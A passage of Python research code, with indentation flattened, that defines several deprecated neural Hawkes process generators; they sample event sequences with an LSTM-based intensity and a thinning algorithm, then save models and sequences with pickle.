print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events = []
list_time = []
list_dtime = []
list_items = []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
list_dtime.append(
round(event_item['time_since_last_event'], 4)
)
list_items.append(
(
event_item['type_event'],
round(
event_item['time_since_last_event'], 4
)
)
)
print("the events, time and diff time for : ", idx_seq)
print(list_events)
print(list_time)
print(list_dtime)
print("the list of items is : ")
print(list_items)
#
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
#
#
#
#
#
#
# deprecated generators
# TODO: modules below are deprecated
# they are models that we tried over this project
# most of them work, better than Hawkes baseline
# but still lose to our neural Hawkes with continuous-time LSTM
# most of them keep the decomposable structure of Hawkes
# and try to use neural networks to parametrize it
#
#
class NeuralHawkesGen(object):
'''
here is the sequence generator using Neural Hawkes process
'''
def __init__(self, settings):
#
self.dim_process = settings['dim_process']
self.dim_model = settings['dim_LSTM']
#
self.dim_float = numpy.int32(32)
self.dim_time = self.dim_float
#
self.args = settings['args']
numpy.random.seed(
settings['seed_random']
)
self.mu = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_process,)
)
)
#
self.delta = numpy.float32(
numpy.random.uniform(
low=10.0, high=20.0,
size=(self.dim_model, self.dim_process)
)
)
#
self.W_alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_model, self.dim_process)
)
)
self.Emb_event = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_process + numpy.int32(1),
self.dim_model
)
)
)
self.Emb_time = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_time, self.dim_model
)
)
)
self.W_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
3 * self.dim_model,
4 * self.dim_model
)
)
)
self.b_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (4*self.dim_model, )
)
)
#
#self.intensity = numpy.copy(self.mu)
self.name = 'NeuralHawkesGen'
#
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'mu': numpy.copy(self.mu),
'delta': numpy.copy(self.delta),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'Emb_time': numpy.copy(self.Emb_time),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
#
def float32_to_bit(self, float_input):
'''
input a number in float, convert it to float32
get its 32-bit representations
'''
float32_input = numpy.float32(float_input)
str_input = ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', float32_input))
bit_input = numpy.zeros(
(self.dim_float,), dtype=dtype
)
assert(self.dim_float == len(str_input))
for idx, item_in_input in enumerate(str_input):
bit_input[idx] = numpy.float32(item_in_input)
return numpy.copy(bit_input)
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
def compute_hidden_states(self):
# every time it is called,
# it computes the new hidden states of the LSTM
# it gets the last event in the sequence
# which is generated at t_(rec(t))
# and compute its hidden states
emb_event_t = self.Emb_event[
self.one_seq[-1]['type_event'], :
]
emb_time_t = numpy.dot(
self.float32_to_bit(
self.one_seq[-1]['time_since_last_event']
),
self.Emb_time
)
post_transform = numpy.dot(
numpy.concatenate(
(emb_event_t, emb_time_t, self.hidden_t),
axis = 0
),
self.W_recur
) + self.b_recur
#
gate_input = self.sigmoid(
post_transform[:self.dim_model]
)
gate_forget = self.sigmoid(
post_transform[self.dim_model:2*self.dim_model]
)
gate_output = self.sigmoid(
post_transform[2*self.dim_model:3*self.dim_model]
)
gate_pre_c = numpy.tanh(
post_transform[3*self.dim_model:]
)
#
cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
hidden_t_new = gate_output * numpy.tanh(cell_t_new)
self.hidden_t = numpy.copy(hidden_t_new)
self.cell_t = numpy.copy(cell_t_new)
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
#
time_recent = self.one_seq[-1]['time_since_start']
#
hidden_with_time = numpy.exp(
-self.delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde = numpy.sum(
self.W_alpha * hidden_with_time,
axis = 0
) + self.mu
#
self.intensity = self.soft_relu(
self.intensity_tilde
)
# intensity computation is finished
#
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
time_recent = self.one_seq[-1]['time_since_start']
#
hidden_with_time = numpy.exp(
-self.delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde_ub = numpy.sum(
self.hard_relu(
self.W_alpha * hidden_with_time
),
axis = 0
) + self.hard_relu(self.mu)
#
self.intensity_ub = self.soft_relu(
self.intensity_tilde_ub
)
# intensity computation is finished
#
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
#
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
u = 1.5
while u >= 1.0:
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
time_current += E / intensity_hazard
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
#
return time_current
#
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in my paper write-up
#
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
# compute the hidden states
# of the most recent event in sequence
self.compute_hidden_states()
#
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
# throw away the BOS item
# at the head of the sequence
self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events, list_time = [], []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
print(list_events)
print(list_time)
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
class GeneralizedNeuralHawkesGen(object):
'''
here is the sequence generator using Neural Hawkes process
'''
def __init__(self, settings):
#
self.dim_process = settings['dim_process']
self.dim_model = settings['dim_LSTM']
#
self.dim_float = numpy.int32(32)
self.dim_time = self.dim_float
#
self.args = settings['args']
numpy.random.seed(
settings['seed_random']
)
self.mu = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_process,)
)
)
#
self.W_delta = numpy.float32(
numpy.random.uniform(
low = -1.0, high= 1.0,
size=(
self.dim_model, self.dim_model,
self.dim_process
)
)
)
#
self.W_alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_model, self.dim_process)
)
)
self.Emb_event = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_process + numpy.int32(1),
self.dim_model
)
)
)
self.Emb_time = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_time, self.dim_model
)
)
)
self.W_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
3 * self.dim_model,
4 * self.dim_model
)
)
)
self.b_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (4*self.dim_model, )
)
)
#
#self.intensity = numpy.copy(self.mu)
self.name = 'GeneralizedNeuralHawkesGen'
#
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'mu': numpy.copy(self.mu),
'W_delta': numpy.copy(self.W_delta),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'Emb_time': numpy.copy(self.Emb_time),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
#
def float32_to_bit(self, float_input):
'''
input a number in float, convert it to float32
get its 32-bit representations
'''
float32_input = numpy.float32(float_input)
str_input = ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', float32_input))
bit_input = numpy.zeros(
(self.dim_float,), dtype=dtype
)
assert(self.dim_float == len(str_input))
for idx, item_in_input in enumerate(str_input):
bit_input[idx] = numpy.float32(item_in_input)
return numpy.copy(bit_input)
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
def compute_hidden_states(self):
# every time it is called,
# it computes the new hidden states of the LSTM
# it gets the last event in the sequence
# which is generated at t_(rec(t))
# and compute its hidden states
emb_event_t = self.Emb_event[
self.one_seq[-1]['type_event'], :
]
emb_time_t = numpy.dot(
self.float32_to_bit(
self.one_seq[-1]['time_since_last_event']
),
self.Emb_time
)
post_transform = numpy.dot(
numpy.concatenate(
(emb_event_t, emb_time_t, self.hidden_t),
axis = 0
),
self.W_recur
) + self.b_recur
#
gate_input = self.sigmoid(
post_transform[:self.dim_model]
)
gate_forget = self.sigmoid(
post_transform[self.dim_model:2*self.dim_model]
)
gate_output = self.sigmoid(
post_transform[2*self.dim_model:3*self.dim_model]
)
gate_pre_c = numpy.tanh(
post_transform[3*self.dim_model:]
)
#
cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
hidden_t_new = gate_output * numpy.tanh(cell_t_new)
self.hidden_t = numpy.copy(hidden_t_new)
self.cell_t = numpy.copy(cell_t_new)
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
#
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde = numpy.sum(
self.W_alpha * hidden_with_time,
axis = 0
) + self.mu
#
self.intensity = self.soft_relu(
self.intensity_tilde
)
# intensity computation is finished
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde_ub = numpy.sum(
self.hard_relu(
self.W_alpha * hidden_with_time
),
axis = 0
) + self.hard_relu(self.mu)
#
self.intensity_ub = self.soft_relu(
self.intensity_tilde_ub
)
# intensity computation is finished
#
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
#
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
u = 1.5
while u >= 1.0:
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
time_current += E / intensity_hazard
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
#
return time_current
#
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in my paper write-up
#
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
# compute the hidden states
# of the most recent event in sequence
self.compute_hidden_states()
#
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
# throw away the BOS item
# at the head of the sequence
self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events, list_time = [], []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
print(list_events)
print(list_time)
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
class NeuralHawkesAdaptiveBaseGen(object):
'''
here is the sequence generator using Neural Hawkes process
'''
def __init__(self, settings):
#
self.dim_process = settings['dim_process']
self.dim_model = settings['dim_LSTM']
#
self.dim_float = numpy.int32(32)
self.dim_time = self.dim_float
#
self.args = settings['args']
numpy.random.seed(
settings['seed_random']
)
self.W_mu = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size = (
self.dim_model, self.dim_process
)
)
)
#
self.W_delta = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size=(
self.dim_model, self.dim_model,
self.dim_process
)
)
)
#
self.W_alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_model, self.dim_process)
)
)
self.Emb_event = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_process + numpy.int32(1),
self.dim_model
)
)
)
self.Emb_time = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_time, self.dim_model
)
)
)
self.W_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
3 * self.dim_model,
4 * self.dim_model
)
)
)
self.b_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (4*self.dim_model, )
)
)
#
#self.intensity = numpy.copy(self.mu)
self.name = 'AdaptiveNeuralHawkesGen'
#
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'W_mu': numpy.copy(self.W_mu),
'W_delta': numpy.copy(self.W_delta),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'Emb_time': numpy.copy(self.Emb_time),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
#
def float32_to_bit(self, float_input):
'''
input a number in float, convert it to float32
get its 32-bit representations
'''
float32_input = numpy.float32(float_input)
str_input = ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', float32_input))
bit_input = numpy.zeros(
(self.dim_float,), dtype=dtype
)
assert(self.dim_float == len(str_input))
for idx, item_in_input in enumerate(str_input):
bit_input[idx] = numpy.float32(item_in_input)
return numpy.copy(bit_input)
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
def compute_hidden_states(self):
# every time it is called,
# it computes the new hidden states of the LSTM
# it gets the last event in the sequence
# which is generated at t_(rec(t))
# and compute its hidden states
emb_event_t = self.Emb_event[
self.one_seq[-1]['type_event'], :
]
emb_time_t = numpy.dot(
self.float32_to_bit(
self.one_seq[-1]['time_since_last_event']
),
self.Emb_time
)
post_transform = numpy.dot(
numpy.concatenate(
(emb_event_t, emb_time_t, self.hidden_t),
axis = 0
),
self.W_recur
) + self.b_recur
#
gate_input = self.sigmoid(
post_transform[:self.dim_model]
)
gate_forget = self.sigmoid(
post_transform[self.dim_model:2*self.dim_model]
)
gate_output = self.sigmoid(
post_transform[2*self.dim_model:3*self.dim_model]
)
gate_pre_c = numpy.tanh(
post_transform[3*self.dim_model:]
)
#
cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
hidden_t_new = gate_output * numpy.tanh(cell_t_new)
self.hidden_t = numpy.copy(hidden_t_new)
self.cell_t = numpy.copy(cell_t_new)
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
#
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde = numpy.sum(
self.W_alpha * hidden_with_time,
axis = 0
) + numpy.dot(
self.hidden_t, self.W_mu
)
#
self.intensity = self.soft_relu(
self.intensity_tilde
)
# intensity computation is finished
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde_ub = numpy.sum(
self.hard_relu(
self.W_alpha * hidden_with_time
),
axis = 0
) + self.hard_relu(
numpy.dot(
self.hidden_t, self.W_mu
)
)
#
self.intensity_ub = self.soft_relu(
self.intensity_tilde_ub
)
# intensity computation is finished
#
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
#
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
u = 1.5
while u >= 1.0:
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
time_current += E / intensity_hazard
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
#
return time_current
#
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in my paper write-up
#
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
# compute the hidden states
# of the most recent event in sequence
self.compute_hidden_states()
#
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
# throw away the BOS item
# at the head of the sequence
self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events, list_time = [], []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
print(list_events)
print(list_time)
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
class NeuralHawkesAdaptiveBaseGen_time(object):
'''
here is the sequence generator using Neural Hawkes process
'''
def __init__(self, settings):
#
print("initializing generator ... ")
self.args = settings['args']
self.dim_float = numpy.int32(32)
if settings['path_pre_train'] == None:
print("random parameters ... ")
self.dim_process = settings['dim_process']
self.dim_model = settings['dim_LSTM']
#
self.dim_time = self.dim_float
numpy.random.seed(
settings['seed_random']
)
self.W_mu = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size = (
self.dim_model, self.dim_process
)
)
)
#
self.W_delta = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size=(
self.dim_model, self.dim_model,
self.dim_process
)
)
)
#
self.W_alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_model, self.dim_process)
)
)
self.Emb_event = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_process + numpy.int32(1),
self.dim_model
)
)
)
self.Emb_time = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_time+numpy.int32(1),
self.dim_model
)
)
)
self.Threshold_time = numpy.float32(
numpy.random.uniform(
low = 0.0, high = 1.0,
size = (self.dim_time, )
)
)
self.W_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
3 * self.dim_model,
4 * self.dim_model
)
)
)
self.b_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (4*self.dim_model, )
)
)
else:
print("read pretrained model ... ")
path_pre_train = os.path.abspath(
settings['path_pre_train']
)
with open(path_pre_train, 'rb') as f:
model_pre_train = pickle.load(f)
self.dim_process = model_pre_train['dim_process']
self.dim_model = model_pre_train['dim_model']
self.dim_time = model_pre_train['dim_time']
#
self.W_mu = model_pre_train['W_mu']
self.W_delta = model_pre_train['W_delta']
self.W_alpha = model_pre_train['W_alpha']
self.Emb_event = model_pre_train['Emb_event']
self.Emb_time = model_pre_train['Emb_time']
self.Threshold_time = model_pre_train['Threshold_time']
self.W_recur = model_pre_train['W_recur']
self.b_recur = model_pre_train['b_recur']
#
#
#self.intensity = numpy.copy(self.mu)
self.name = 'AdaptiveNeuralHawkesGen_time'
#
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
